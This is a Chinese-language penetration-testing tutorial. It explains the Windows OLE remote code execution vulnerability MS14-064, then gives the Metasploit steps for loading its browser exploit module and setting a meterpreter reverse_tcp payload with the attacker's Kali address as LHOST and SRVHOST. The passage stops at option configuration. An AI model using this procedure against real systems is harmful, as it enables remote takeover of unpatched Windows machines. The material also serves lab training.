搜索漏洞,编号为MS14-064。
MS14-064为Windows OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。
【补充:Windows系统漏洞微软的漏洞编号命名格式为:MS14-064;
MS Micosoft的缩写,固定格式;
14 表示年份,即2014年发布的漏洞;
064 表示顺序,即当年度发布的第64个漏洞。
>search ms14-064
**结果:**可以看到返回了多条可利用的漏洞模块信息
利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)。
>use exploit/windows/browser/ms14_064_ole_code_execution
**结果:**成功切换到这个模块之下--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“
并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/meterpreter/reverse_tcp
进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。
>show options
**结果:**其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
重点关注6个参数配置,需要设置哪个就设置哪个:
Payload (攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;
SRVHOST (文件共享服务器-kali地址);
SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);
LHOST (发起攻击的地址-kali地址);
LPORT (发起攻击的端口-使用默认获取的端口即可);
AllowPowershellPrompt (开启浏览器插件,默认为false)
